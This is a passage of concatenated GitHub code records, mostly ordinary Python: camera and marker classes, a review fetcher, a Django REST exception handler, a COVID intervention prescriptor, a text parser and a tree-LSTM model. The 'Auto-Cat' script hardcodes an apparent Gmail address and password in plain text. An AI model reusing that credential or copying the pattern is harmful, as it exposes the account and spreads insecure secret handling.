cv2.VideoCapture(0)\n elif self.camera_type == CameraType.custom:\n self.camera = cv2.VideoCapture(source)\n\n def get_frame(self):\n \"\"\"\n Gets the next frame from the video stream. Querying this will\n retrieve a new frame from the device\n\n \"\"\"\n if self.camera_type == CameraType.pi:\n with picamera.array.PiRGBArray(self.camera) as stream:\n self.camera.capture(stream, format='rgb')\n frame = stream.array\n elif self.camera_type == CameraType.cv:\n ret, frame = self.camera.read()\n elif self.camera_type == CameraType.custom:\n ret, frame = self.camera.read()\n else:\n raise RuntimeError('Cannot get frame: Unknown camera type.')\n\n self.previous_frame = self.current_frame\n self.current_frame = frame\n return frame\n\n def get_previous_frame(self):\n \"\"\"\n After get_frame is called, this can be used to access the previous\n frame\n\n \"\"\"\n if self.previous_frame is None:\n return self.current_frame\n return self.previous_frame\n\n def __del__(self):\n if self.camera_type != CameraType.pi:\n self.camera.release()\n\n instance = None\n\n def __init__(self, source=None):\n if not Camera.instance:\n Camera.instance = Camera._Camera(source)\n else:\n Camera.instance.source = source\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n","repo_name":"heidtn/MeteorTracker","sub_path":"meteortracker/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"11673284984","text":"import numpy as np\r\nfrom collections import deque\r\n\r\nclass Marker:\r\n\r\n n_dims = 3\r\n\r\n def __init__(self, name, initpos=np.array([0,0,0],dtype=float), memory_size=3):\r\n \r\n if len(initpos) != 3:\r\n raise ValueError(\"Position must be a 1x3 array or list.\")\r\n if isinstance(initpos, type(np.array([]))):\r\n self.pos = initpos\r\n else:\r\n self.pos = np.array(initpos, dtype=float)\r\n self.visible = False\r\n self.name = name\r\n self.memory_size = memory_size\r\n self.old_pos = deque([self.pos]*self.memory_size, maxlen=self.memory_size)\r\n\r\n def update_pos(self, new_pos, update_history=False):\r\n if len(new_pos) != Marker.n_dims:\r\n raise Exception(\"Incorrect dimensions for updating positon\")\r\n if update_history:\r\n self.old_pos.popleft()\r\n self.old_pos.append(self.pos)\r\n self.pos = np.array(new_pos, dtype=float)\r\n\r\n def get_pos(self):\r\n return self.pos\r\n\r\n def get_previous_positions(self, stop_drift=True):\r\n \"\"\"\r\n Stop drift will set all previous positions to current position if the marker has not been\r\n visible for the length of it's memory.\r\n\r\n Return: numpy array of previous positions and current position of marker \r\n from oldest to newest going from row 0->self.memory_size+1 (current position at end)\r\n \"\"\"\r\n previous_points = np.zeros((self.memory_size+1, Marker.n_dims))\r\n try:\r\n for i in range(self.memory_size):\r\n previous_points[i][:] = self.old_pos[i]\r\n except IndexError:\r\n pass\r\n previous_points[self.memory_size][:] = self.pos\r\n return previous_points\r\n\r\n def set_to_visible(self):\r\n self.visible = True\r\n\r\n def set_to_invisible(self):\r\n # call if you don't want to update position (ie. not a complete frame time)\r\n self.visible = False\r\n\r\n def is_visible(self):\r\n return self.visible\r\n\r\n def __repr__(self):\r\n out_list = []\r\n out_list.append(\"Marker<<\")\r\n out_list.append(\"Name: %s, \" % self.name)\r\n out_list.append(\"Previous Positions: %s, \" % str(self.old_pos))\r\n out_list.append(\"Current Position: %s, \" % str(self.pos))\r\n out_list.append(\"Visible: %s\" % str(self.visible))\r\n out_list.append(\">>\")\r\n return \"\".join(out_list)\r\n\r\nif __name__ == \"__main__\":\r\n mk = Marker(\"test\")\r\n print(mk.get_previous_positions())\r\n print()\r\n mk.update_pos([1,1,1])\r\n print(mk.get_previous_positions())\r\n print()\r\n mk.update_pos([2,2,2])\r\n print(mk.get_previous_positions())\r\n print()\r\n mk.update_pos([3,2,2])\r\n print(mk.get_previous_positions())\r\n print()\r\n mk.update_pos([4,2,2])\r\n print(mk.get_previous_positions())\r\n print()\r\n mk.update_pos([5,2,2])\r\n print(mk.get_previous_positions())","repo_name":"danivi2000/UofA_Fixed_Comp_2020","sub_path":"bodyTracking/marker_class.py","file_name":"marker_class.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35635148626","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/3/15 0015\n# @Author : yang\n# @Email : 2635681517@qq.com\n# @File : 79.py\n\"\"\"求1+2!+3!+...+20!的和。\"\"\"\n\n\ndef f(n):\n \"\"\"计算阶乘\"\"\"\n sun = 1\n for i in range(1, n + 1):\n sun = sun * i\n return sun\n\n\ndef su(n):\n rest = 0\n for i in range(1, n + 1):\n rest += f(i)\n return rest\n\n\nif __name__ == \"__main__\":\n print(su(20))\n print(f(4))\n","repo_name":"Futureword123456/PythonSystemStudy","sub_path":"com/Pythonbaseknowledge/Interview/8/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42670391617","text":"import logging\n\nfrom tqdm import tqdm\n\nfrom repositories.film import FilmStatus\nfrom repositories.queue_utils import QueueUtils\nfrom repositories.sqlbase import Session\nfrom worker.date_time_utils import SecondsPeriodBuilder\nfrom worker.fetching.review_fetcher_utils import get_k_reviews\nfrom worker.tasks.task import Task\n\n\nclass ReviewFetcherTask(Task):\n _name = 'ReviewFetcherTask'\n postgres_session = Session\n\n def __init__(self, queue: QueueUtils):\n self.queue = queue\n self.logger = logging.getLogger('taskManager.' + self._name)\n\n def name(self):\n return self._name\n\n def time_period(self):\n return SecondsPeriodBuilder().add_hours(5).build()\n\n # def delay(self):\n # return SecondsPeriodBuilder().add_minutes(5).build()\n\n def run(self):\n self.logger.info(\"Getting movies from queue...\")\n films = self.queue.get_all_films_from_queue(FilmStatus.INFO_FETCHED)\n self.logger.info(\"Got {0} movies from queue\".format(len(films)))\n\n self.logger.info(\"Getting reviews from KP...\")\n reviews_by_film_id = {}\n reviews_count = 0\n # hundreds = 0\n for i in tqdm(range(len(films))):\n film = films[i]\n reviews = get_k_reviews(film.film_id, 4)\n reviews_count += len(reviews)\n # if reviews_count // 100 > hundreds:\n # hundreds = reviews_count // 100\n # self.logger.info(\"Already got {0}\".format(reviews_count))\n # self.logger.info(\"Last film {0}\".format(film.film_id))\n reviews_by_film_id[film.film_id] = reviews\n # self.queue.change_film_status(film.film_id, FilmStatus.REVIEWS_FETCHING)\n self.logger.info(\"Got {0} reviews from queue\".format(reviews_count))\n\n self.logger.info(\"Saving reviews to queue...\")\n reviews_count = 0\n for film_id, reviews in reviews_by_film_id.items():\n for review in reviews:\n self.queue.append_review(review)\n reviews_count += 1\n self.queue.change_film_status(film_id, FilmStatus.PROCESSED)\n self.logger.info(\"Saved {0} reviews to queue\".format(reviews_count))\n","repo_name":"dapodshivalov/movie_search_server","sub_path":"worker/tasks/review_fetcher_task.py","file_name":"review_fetcher_task.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24481631211","text":"#task_F\nn = int(input())\ns = input()\nA = list(map(int, s.split()))\nm = abs(A[0] - A[1])\nx1 = 0\nx2 = 1\nfor i in range(len(A)):\n\tfor j in range(i + 1, len(A)):\n\t\tif m > abs(A[i] - A[j]):\n\t\t\tm = abs(A[i] - A[j])\n\t\t\tx1 = i\n\t\t\tx2 = j\nprint(x1, x2)\n\n","repo_name":"Senbjorn/mipt_lab_2016","sub_path":"contest_5/task_F.py","file_name":"task_F.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73393115251","text":"from django.utils.translation import gettext_lazy as _\nfrom rest_framework.utils.serializer_helpers import OrderedDict, ReturnDict\nfrom rest_framework.views import exception_handler\n\nfrom ..schemas.response import DefaultResponse\n\nUNKNOWN_ERROR = _(\"Unknown error while processing your request.\")\nNON_FIELDS_ERRORS = [\"detail\", \"non_field_errors\"]\n\n\ndef _stringify_non_generic_types(data):\n \"\"\"Remove non-generic types from values of dict or list\n For example: {'detail': [ErrorDetail(message = 'Unknown error')]}\n Will be converted to: {'detail': ['Unknown error']} (by str representation of ErrorDetail)\n \"\"\"\n if type(data) is list:\n for index, item in enumerate(data):\n data[index] = _stringify_non_generic_types(item)\n elif type(data) in [dict, OrderedDict, ReturnDict]:\n for key, value in data.items():\n data[key] = _stringify_non_generic_types(value)\n elif type(data) not in [str, int, bool, float]:\n return str(data) if data is not None else UNKNOWN_ERROR\n return data\n\n\ndef _get_error_message_with_validation_errors(\n error_data: dict | OrderedDict | ReturnDict | list | str,\n) -> tuple[str, dict, bool]:\n message, validation_errors, has_child = UNKNOWN_ERROR, {}, False\n if type(error_data) is list and len(error_data) > 0:\n error_item = error_data[0]\n child_message, child_validation_errors, child_has_child = _get_error_message_with_validation_errors(error_item)\n has_child = len(child_validation_errors) > 0 or child_has_child\n message = child_message\n elif type(error_data) in [dict, OrderedDict, ReturnDict] and len(error_data.keys()) > 0:\n validation_errors = error_data\n for field_name, child_error_data in error_data.items():\n child_message, child_validation_errors, child_has_child = _get_error_message_with_validation_errors(\n child_error_data\n )\n delimiter = \":\" if (not child_has_child and len(child_validation_errors) == 0) else \" >\"\n has_child = len(child_validation_errors) > 0 or child_has_child\n message = f\"{field_name}{delimiter} {child_message}\"\n break\n elif type(error_data) is str:\n has_child = False\n message = error_data\n else:\n has_child = False\n message = UNKNOWN_ERROR\n return message, validation_errors, has_child\n\n\ndef drf_exception_handler(exc, context):\n response = exception_handler(exc, context)\n\n if response is not None:\n default_data = DefaultResponse(\n success=False,\n status_code=response.status_code,\n message=_(\"Unknown error while processing your request.\"),\n validation_errors={},\n data=None,\n ).to_dict()\n error_data: str | dict | OrderedDict | ReturnDict | list = _stringify_non_generic_types(response.data or {})\n error_message, validation_errors, __ = _get_error_message_with_validation_errors(error_data)\n for non_field_error in NON_FIELDS_ERRORS:\n replace_text = f\"{non_field_error}: \"\n if error_message.startswith(replace_text):\n error_message = error_message.replace(replace_text, \"\")\n default_data[\"message\"] = error_message\n default_data[\"validation_errors\"] = validation_errors\n response.data = default_data\n else:\n default_data = DefaultResponse(\n success=False,\n status_code=500,\n message=str(exc),\n validation_errors={},\n data=None,\n )\n response = default_data\n\n return response\n","repo_name":"riso-tech/django-saas","sub_path":"one/utils/rest_framework/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17667000419","text":"import os\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom copy import deepcopy\n\nimport neat\n\n# Path to file containing neat prescriptors. Here we simply use a\n# recent checkpoint of the population from train_prescriptor.py,\n# but this is likely not the most complementary set of prescriptors.\n# Many approaches can be taken to generate/collect more diverse sets.\n# Note: this set can contain up to 10 prescriptors for evaluation.\nfrom covid_xprize.examples.prescriptors.neat.utils import prepare_historical_df, CASES_COL, IP_COLS, IP_MAX_VALUES, \\\n add_geo_id, get_predictions, PRED_CASES_COL\n\nPRESCRIPTORS_FILE = 'neat-checkpoint-0'\n\n# Number of days the prescriptors look at in the past.\nNB_LOOKBACK_DAYS = 14\n\n\ndef prescribe(start_date_str: str,\n end_date_str: str,\n path_to_prior_ips_file: str,\n path_to_cost_file: str,\n output_file_path) -> None:\n\n start_date = pd.to_datetime(start_date_str, format='%Y-%m-%d')\n end_date = pd.to_datetime(end_date_str, format='%Y-%m-%d')\n\n # Load historical data with basic preprocessing\n print(\"Loading historical data...\")\n df = prepare_historical_df()\n\n # Restrict it to dates before the start_date\n df = df[df['Date'] <= start_date]\n\n # Fill in any missing case data using predictor given ips_df.\n # todo: ignore ips_df for now, and instead assume we have case\n # data for all days and geos up until the start_date.\n\n # Create historical data arrays for all geos\n past_cases = {}\n past_ips = {}\n for geo in df['GeoID'].unique():\n geo_df = df[df['GeoID'] == geo]\n past_cases[geo] = np.maximum(0, np.array(geo_df[CASES_COL]))\n past_ips[geo] = np.array(geo_df[IP_COLS])\n\n # Gather values for scaling network output\n ip_max_values_arr = np.array([IP_MAX_VALUES[ip] for ip in IP_COLS])\n\n # Load prescriptors\n checkpoint = neat.Checkpointer.restore_checkpoint(PRESCRIPTORS_FILE)\n prescriptors = checkpoint.population.values()\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n 'config-prescriptor')\n\n # Load IP costs to condition prescriptions\n cost_df = pd.read_csv(path_to_cost_file)\n cost_df['RegionName'] = cost_df['RegionName'].fillna(\"\")\n cost_df = add_geo_id(cost_df)\n geo_costs = {}\n for geo in cost_df['GeoID'].unique():\n costs = cost_df[cost_df['GeoID'] == geo]\n cost_arr = np.array(costs[IP_COLS])[0]\n geo_costs[geo] = cost_arr\n\n # Generate prescriptions\n prescription_dfs = []\n for prescription_idx, prescriptor in enumerate(prescriptors):\n print(\"Generating prescription\", prescription_idx, \"...\")\n\n # Create net from genome\n net = neat.nn.FeedForwardNetwork.create(prescriptor, config)\n\n # Set up dictionary for keeping track of prescription\n df_dict = {'CountryName': [], 'RegionName': [], 'Date': []}\n for ip_col in sorted(IP_MAX_VALUES.keys()):\n df_dict[ip_col] = []\n\n # Set initial data\n eval_past_cases = deepcopy(past_cases)\n eval_past_ips = deepcopy(past_ips)\n\n # Generate prescriptions one day at a time, feeding resulting\n # predictions from the predictor back into the prescriptor.\n for date in pd.date_range(start_date, end_date):\n date_str = date.strftime(\"%Y-%m-%d\")\n\n # Get prescription for all regions\n for geo in df['GeoID'].unique():\n\n # Prepare input data. Here we use log to place cases\n # on a reasonable scale; many other approaches are possible.\n X_cases = np.log(eval_past_cases[geo][-NB_LOOKBACK_DAYS:] + 1)\n X_ips = eval_past_ips[geo][-NB_LOOKBACK_DAYS:]\n X_costs = geo_costs[geo]\n X = np.concatenate([X_cases.flatten(),\n X_ips.flatten(),\n X_costs])\n\n # Get prescription\n prescribed_ips = net.activate(X)\n\n # Map prescription to integer outputs\n prescribed_ips = (prescribed_ips * ip_max_values_arr).round()\n\n # Add it to prescription dictionary\n country_name, region_name = geo.split('__')\n if region_name == 'nan':\n region_name = np.nan\n df_dict['CountryName'].append(country_name)\n df_dict['RegionName'].append(region_name)\n df_dict['Date'].append(date_str)\n for ip_col, prescribed_ip in zip(IP_COLS, prescribed_ips):\n df_dict[ip_col].append(prescribed_ip)\n\n # Create dataframe from prescriptions\n pres_df = pd.DataFrame(df_dict)\n\n # Make prediction given prescription for all countries\n pred_df = get_predictions(start_date_str, date_str, pres_df)\n\n # Update past data with new day of prescriptions and predictions\n pres_df['GeoID'] = pres_df['CountryName'] + '__' + pres_df['RegionName'].astype(str)\n pred_df['RegionName'] = pred_df['RegionName'].fillna(\"\")\n pred_df['GeoID'] = pred_df['CountryName'] + '__' + pred_df['RegionName'].astype(str)\n new_pres_df = pres_df[pres_df['Date'] == date_str]\n new_pred_df = pred_df[pred_df['Date'] == date_str]\n for geo in df['GeoID'].unique():\n geo_pres = new_pres_df[new_pres_df['GeoID'] == geo]\n geo_pred = new_pred_df[new_pred_df['GeoID'] == geo]\n\n # Append array of prescriptions\n pres_arr = np.array([geo_pres[ip_col].values[0] for ip_col in IP_COLS]).reshape(1,-1)\n eval_past_ips[geo] = np.concatenate([eval_past_ips[geo], pres_arr])\n\n # It is possible that the predictor does not return values for some regions.\n # To make sure we generate full prescriptions, this script continues anyway.\n # Geos that are ignored in this way by the predictor, will not be used in\n # quantitative evaluation. A list of such geos can be found in unused_geos.txt.\n if len(geo_pred) != 0:\n eval_past_cases[geo] = np.append(eval_past_cases[geo],\n geo_pred[PRED_CASES_COL].values[0])\n\n # Add prescription df to list of all prescriptions for this submission\n pres_df['PrescriptionIndex'] = prescription_idx\n prescription_dfs.append(pres_df)\n\n # Combine dfs for all prescriptions into a single df for the submission\n prescription_df = pd.concat(prescription_dfs)\n\n # Create the output path\n os.makedirs(os.path.dirname(output_file_path), exist_ok=True)\n\n # Save to a csv file\n prescription_df.to_csv(output_file_path, index=False)\n print('Prescriptions saved to', output_file_path)\n\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--start_date\",\n dest=\"start_date\",\n type=str,\n required=True,\n help=\"Start date from which to prescribe, included, as YYYY-MM-DD.\"\n \"For example 2020-08-01\")\n parser.add_argument(\"-e\", \"--end_date\",\n dest=\"end_date\",\n type=str,\n required=True,\n help=\"End date for the last prescription, included, as YYYY-MM-DD.\"\n \"For example 2020-08-31\")\n parser.add_argument(\"-ip\", \"--interventions_past\",\n dest=\"prior_ips_file\",\n type=str,\n required=True,\n help=\"The path to a .csv file of previous intervention plans\")\n parser.add_argument(\"-c\", \"--intervention_costs\",\n dest=\"cost_file\",\n type=str,\n required=True,\n help=\"Path to a .csv file containing the cost of each IP for each geo\")\n parser.add_argument(\"-o\", \"--output_file\",\n dest=\"output_file\",\n type=str,\n required=True,\n help=\"The path to an intervention plan .csv file\")\n args = parser.parse_args()\n print(f\"Generating prescriptions from {args.start_date} to {args.end_date}...\")\n prescribe(args.start_date, args.end_date, args.prior_ips_file, args.cost_file, args.output_file)\n print(\"Done!\")\n","repo_name":"katherinesing/usc-xprize-covid","sub_path":"covid-xprize/covid_xprize/examples/prescriptors/neat/prescribe.py","file_name":"prescribe.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31912043368","text":"def stringToDict(string):\n #Parse text\n letters = \"abcdefghijklmnopqrstuvwzyzABCDEFGHIJKLMNOPQRSTUVWXYZ-'\"\n string = string + \" \"\n words = {}\n currentWord = \"\"\n wordIsStarted = False\n for i in range(0, len(string)):\n character = string[i]\n if character in letters:\n wordIsStarted = True\n currentWord += character\n else:\n if wordIsStarted:\n if currentWord in words:\n words[currentWord] += 1\n else:\n words[currentWord] = 1\n currentWord = \"\"\n wordIsStarted = False\n\n return sortDictReverse(words)\n\ndef stringToList(string):\n letters = \"abcdefghijklmnopqrstuvwzyzABCDEFGHIJKLMNOPQRSTUVWXYZ-',\"\n string = string + \" \"\n words = []\n currentWord = \"\"\n wordIsStarted = False\n for i in range(0, len(string)):\n character = string[i]\n if character in letters:\n wordIsStarted = True\n currentWord += character\n elif character == \".\":\n if wordIsStarted:\n words.append(currentWord)\n words.append(\".\")\n currentWord = \"\"\n wordIsStarted = False\n else:\n if wordIsStarted:\n words.append(currentWord)\n currentWord = \"\"\n wordIsStarted = False\n\n return words\n \n \n\n\ndef sortDictReverse(dictionary):\n \n #Sort dictionary in reverse number order\n newDict = {}\n for i in range(0, len(sorted(dictionary.values()))):\n for key in dictionary.keys():\n if dictionary[key] == sorted(dictionary.values())[len(sorted(dictionary.values())) - i - 1]:\n newDict[key] = sorted(dictionary.values())[len(sorted(dictionary.values())) - i - 1]\n \n return newDict\n\ndef combineDix(dict1, dict2):\n #This adds together two dictionaries whose values are integers\n for key, value in dict1.items():\n if key in dict2.keys():\n dict2[key] += value\n else:\n dict2[key] = value\n\n return sortDictReverse(dict2)\n\ndef sentenceBreakdown(sentence):\n words = stringToList(sentence)\n for i in range(0, len(words)):\n if words[i].isNoun:\n if words[i + 1].isVerb:\n noun = words[i]\n","repo_name":"sestinj/edgar-allen-poetry","sub_path":"TextParser.py","file_name":"TextParser.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31184578681","text":"from Email import *\nfrom Motor import *\nimport time\nimport schedule\n\ndef initialization():\n print(\"Auto-Cat initializing\")\n email = Email(465,'Auto.Cat.Messaging@gmail.com','AutoCatProject')\n motor = Motor(21,50,5)\n #schedule.every(1).minutes.do(email.sendEmail,'sergio.c.842@gmail.com','This is a test')\n #schedule.every().day.at(\"22:19\").do(email.sendEmail,'eliazar.d.842@gmail.com','hey :)')\n schedule.every(1).minutes.do(motor.feed,10,5)\n #Add any other initializing components here\n print(\"Auto-Cat initializing complete\")\n\ndef main():\n #Call initilization function\n initialization()\n\n #loop forever\n while True:\n print('Auto-Cat running')\n schedule.run_pending()\n time.sleep(1)\n \n#Call main function\nmain()\n","repo_name":"SurgeCS/Auto-Cat","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3901605900","text":"# Problem:\n# https://leetcode.com/contest/weekly-contest-77/problems/max-increase-to-keep-city-skyline/\n# Difficulty: Medium\n# Runtime: 57ms\n# I solved this as a part of contest 27 in 9 minutes.\n\nclass Solution(object):\n def maxIncreaseKeepingSkyline(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n max_in_rows = []\n max_in_cols = []\n cols = []\n for i in range(0, len(grid[0])):\n cols.append([])\n \n for row in grid:\n m = max(row)\n max_in_rows.append(m)\n for idx, item in enumerate(row):\n cols[idx].append(item)\n \n for col in cols:\n max_in_cols.append(max(col))\n \n total_change = 0\n for idx_g, row in enumerate(grid):\n for idx_r, item in enumerate(row):\n max_val = min(max_in_rows[idx_g], max_in_cols[idx_r])\n change = max_val - item\n total_change += change\n \n return total_change\n ","repo_name":"DanielPBak/Practice-Work","sub_path":"leetcode/Medium Questions/max_increase_to_skyline.py","file_name":"max_increase_to_skyline.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22462433739","text":"import sys\nimport math\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom datetime import datetime\nimport gc\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\n\ndef ortho_weight(ndim):\n\t\"\"\"\n\tRandom orthogonal weights\n\tUsed by norm_weights(below), in which case, we\n\tare ensuring that the rows are orthogonal\n\t(i.e W = U \\Sigma V, U has the same\n\t# of rows, V has the same # of cols)\n\t\"\"\"\n\tW = np.random.randn(ndim, ndim)\n\tu, s, v = np.linalg.svd(W)\n\treturn u.astype('float32')\n\n# mapping from scalar to vector\ndef map_label_to_target(label,num_classes):\n\ttarget = torch.Tensor(1,num_classes)\n\tceil = int(math.ceil(label))\n\tfloor = int(math.floor(label))\n\tif ceil==floor:\n\t\ttarget[0][floor-1] = 1\n\telse:\n\t\ttarget[0][floor-1] = ceil - label\n\t\ttarget[0][ceil-1] = label - floor\n\treturn target\n\ndef map_label_to_target_sentiment(label, num_classes = 0 ,fine_grain = False):\n\t# num_classes not use yet\n\ttarget = torch.LongTensor(1)\n\ttarget[0] = int(label) # nothing to do here as we preprocess data\n\treturn target\n\nclass BinaryTreeLeafModule(nn.Module):\n\n\tdef __init__(self, cuda, in_dim, mem_dim):\n\t\tsuper(BinaryTreeLeafModule, self).__init__()\n\t\tself.cudaFlag = cuda\n\t\tself.in_dim = in_dim\n\t\tself.mem_dim = mem_dim\n\n\t\tself.cx = nn.Linear(self.in_dim, self.mem_dim)\n\t\tself.ox = nn.Linear(self.in_dim, self.mem_dim)\n\t\tif self.cudaFlag:\n\t\t\tself.cx = self.cx.cuda()\n\t\t\tself.ox = self.ox.cuda()\n\n\tdef forward(self, input):\n\t\tc = self.cx(input)\n\t\to = F.sigmoid(self.ox(input))\n\t\th = o * F.tanh(c)\n\t\treturn c, h\n\nclass BinaryTreeComposer(nn.Module):\n\n\tdef __init__(self, cuda, in_dim, mem_dim):\n\t\tsuper(BinaryTreeComposer, self).__init__()\n\t\tself.cudaFlag = cuda\n\t\tself.in_dim = in_dim\n\t\tself.mem_dim = mem_dim\n\n\t\tdef new_gate():\n\t\t\tlh = nn.Linear(self.mem_dim, self.mem_dim, bias=False)\n\t\t\trh = nn.Linear(self.mem_dim, self.mem_dim, bias=False)\n\t\t\tlh.weight.data.copy_(torch.from_numpy(ortho_weight(self.mem_dim)))\n\t\t\trh.weight.data.copy_(torch.from_numpy(ortho_weight(self.mem_dim)))\n\t\t\treturn lh, rh\n\n\t\tdef new_W():\n\t\t\tw = nn.Linear(self.in_dim, self.mem_dim)\n\t\t\tw.weight.data.copy_(torch.from_numpy(ortho_weight(self.mem_dim)))\n\t\t\treturn w\n\n\t\tself.ilh, self.irh = new_gate()\n\t\tself.lflh, self.lfrh = new_gate()\n\t\tself.rflh, self.rfrh = new_gate()\n\t\tself.ulh, self.urh = new_gate()\n\t\tself.olh, self.orh = new_gate()\n\n\t\tself.cx = new_W()\n\t\tself.ox = new_W()\n\t\tself.fx = new_W()\n\t\tself.ix = new_W()\n\n\t\tif self.cudaFlag:\n\t\t\tself.ilh = self.ilh.cuda()\n\t\t\tself.irh = self.irh.cuda()\n\t\t\tself.lflh = self.lflh.cuda()\n\t\t\tself.lfrh = self.lfrh.cuda()\n\t\t\tself.rflh = self.rflh.cuda()\n\t\t\tself.rfrh = self.rfrh.cuda()\n\t\t\tself.ulh = self.ulh.cuda()\n\t\t\tself.urh = self.urh.cuda()\n\t\t\tself.olh = self.olh.cuda()\n\t\t\tself.orh = self.orh.cuda()\n\n\tdef forward(self, input, lc, lh , rc, rh):\n\t\tu = F.tanh(self.cx(input) + self.ulh(lh) + self.urh(rh))\n\t\ti = F.sigmoid(self.ix(input) + self.ilh(lh) + self.irh(rh))\n\t\tlf = F.sigmoid(self.fx(input) + self.lflh(lh) + self.lfrh(rh))\n\t\trf = F.sigmoid(self.fx(input) + self.rflh(lh) + self.rfrh(rh))\n\t\tc = i* u + lf*lc + rf*rc\n\t\to = F.sigmoid(self.ox(input) + self.olh(lh) + self.orh(rh))\n\t\th = o * F.tanh(c)\n\t\treturn c, h\n\nclass BinaryTreeLSTM(nn.Module):\n\tdef __init__(self, cuda, in_dim, mem_dim, word_embedding, num_words):\n\t\tsuper(BinaryTreeLSTM, self).__init__()\n\t\tself.cudaFlag = cuda\n\t\tself.in_dim = in_dim\n\t\tself.mem_dim = mem_dim\n\t\tself.word_embedding=word_embedding\n\t\tself.num_words=num_words\n\n\t\t#self.leaf_module = BinaryTreeLeafModule(cuda,in_dim, mem_dim)\n\t\tself.composer = BinaryTreeComposer(cuda, in_dim, mem_dim)\n\t\tself.output_module = None\n\t\tself.all_ststes=[]\n\t\tself.all_words=[]\n\n\tdef set_output_module(self, output_module):\n\t\tself.output_module = output_module\n\n\tdef getParameters(self):\n\t\t\"\"\"\n\t\tGet flatParameters\n\t\tnote that getParameters and parameters is not equal in this case\n\t\tgetParameters do not get parameters of output module\n\t\t:return: 1d tensor\n\t\t\"\"\"\n\t\tparams = []\n\t\tfor m in [self.ix, self.ih, self.fx, self.fh, self.ox, self.oh, self.ux, self.uh]:\n\t\t\t# we do not get param of output module\n\t\t\tl = list(m.parameters())\n\t\t\tparams.extend(l)\n\n\t\tone_dim = [p.view(p.numel()) for p in params]\n\t\tparams = F.torch.cat(one_dim)\n\t\treturn params\n\n\tdef forward(self, tree, embs, PAD):\n\n\t\tif tree.num_children == 0:\n\t\t\tlc = Variable(torch.zeros(1, self.mem_dim))\n\t\t\tlh = Variable(torch.zeros(1, self.mem_dim))\n\t\t\trc = Variable(torch.zeros(1, self.mem_dim))\n\t\t\trh = Variable(torch.zeros(1, self.mem_dim))\n\t\t\tif torch.cuda.is_available():\n\t\t\t\tlc = lc.cuda()\n\t\t\t\tlh = lh.cuda()\n\t\t\t\trc = rc.cuda()\n\t\t\t\trh = rh.cuda()\n\t\t\ttree.state = self.composer.forward(embs[tree.idx-1], lc, lh, rc, rh)\n\t\t\tself.all_ststes.append(tree.state[1].view(1, self.mem_dim))\n\t\t\t#self.all_words.append(embs[tree.idx-1])\n\t\telse:\n\t\t\tfor idx in xrange(tree.num_children):\n\t\t\t\t_ = self.forward(tree.children[idx], embs, PAD)\n\n\t\t\tlc, lh, rc, rh = self.get_child_state(tree)\n\t\t\tif PAD:\n\t\t\t\tindex = Variable(torch.LongTensor([self.num_words-1]))\n\t\t\t\tif torch.cuda.is_available():\n\t\t\t\t\tindex=index.cuda()\n\t\t\t\ttree.state = self.composer.forward(self.word_embedding(index),lc, lh, rc, rh)\n\t\t\telse:\n\t\t\t\ttree.state = self.composer.forward(embs[tree.idx - 1], lc, lh, rc, rh)\n\t\t\tself.all_ststes.append(tree.state[1].view(1,self.mem_dim))\n\t\t\t#self.all_words.append(self.word_embedding[self.num_words-1])\n\n\t\treturn tree.state#, loss\n\n\tdef get_child_state(self, tree):\n\t\tlc, lh = tree.children[0].state\n\t\trc, rh = tree.children[1].state\n\t\treturn lc, lh, rc, rh\n\nclass ESIM(nn.Module):\n\t\"\"\"\n\t\tImplementation of the multi feed forward network model described in\n\t\tthe paper \"A Decomposable Attention Model for Natural Language\n\t\tInference\" by Parikh et al., 2016.\n\n\t\tIt applies feedforward MLPs to combinations of parts of the two sentences,\n\t\twithout any recurrent structure.\n\t\"\"\"\n\tdef __init__(self, num_units, num_classes, vocab_size, embedding_size, pretrained_emb, num_words):\n\t\tsuper(ESIM, self).__init__()\n\t\tself.vocab_size=vocab_size\n\t\tself.num_units = num_units\n\t\tself.num_classes = num_classes\n\t\tself.embedding_size=embedding_size\n\t\tself.pretrained_emb=pretrained_emb\n\n\t\tself.dropout = nn.Dropout(p=0.5)\n\t\tself.word_embedding=nn.Embedding(vocab_size,embedding_size)\n\n\t\tself.tree_lstm_intra=BinaryTreeLSTM(torch.cuda.is_available(),embedding_size,num_units, self.word_embedding, num_words)\n\n\t\tself.linear_layer_compare = nn.Sequential(nn.Linear(4*num_units, num_units), nn.ReLU(), nn.Dropout(p=0.5))\n\t\t# nn.Dropout(p=0.2), nn.Linear(num_units, num_units), 